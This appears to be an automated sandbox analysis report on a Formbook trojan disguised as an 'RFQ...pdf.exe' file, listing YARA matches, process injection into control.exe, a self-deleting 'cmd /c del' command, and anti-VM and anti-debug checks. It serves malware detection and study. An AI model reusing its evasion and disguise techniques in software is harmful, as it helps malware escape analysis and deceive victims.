          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048622AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485DBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048503DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00708C50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00708C4B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071C5A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: String function: 009CB150 appears 45 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0479B150 appears 39 times
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@17/8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsp8287.tmpJump to behavior
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeVirustotal: Detection: 35%
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041D067 push ss; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004152DB push esi; rep ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0040AB63 push esi; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00414DEF push ss; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041C597 push esi; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041CE86 push esi; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00414F7F push FFFFFF97h; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071D067 push ss; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007152DB push esi; rep ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0070AB63 push esi; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3FB push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B45C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00714DEF push ss; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071C597 push esi; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071CE86 push esi; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00714F7F push FFFFFF97h; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dllJump to dropped file
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6872Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6776Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmpBinary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_026C163F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_026C1857 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
